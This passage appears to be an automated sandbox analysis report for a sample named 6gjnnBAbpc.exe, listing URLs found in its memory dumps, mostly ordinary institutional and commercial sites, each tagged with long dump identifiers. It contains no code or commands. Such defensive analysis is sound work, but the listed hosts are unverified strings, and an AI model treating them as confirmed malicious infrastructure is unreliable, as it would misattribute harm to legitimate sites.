6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D4E000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D4D000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668827436.0000000008D4E000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541499970.0000000008D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chd.com.cn/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/index.shtml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cnpc.com.cn/cnpc/xhtml/images/logo.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.css?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kreat
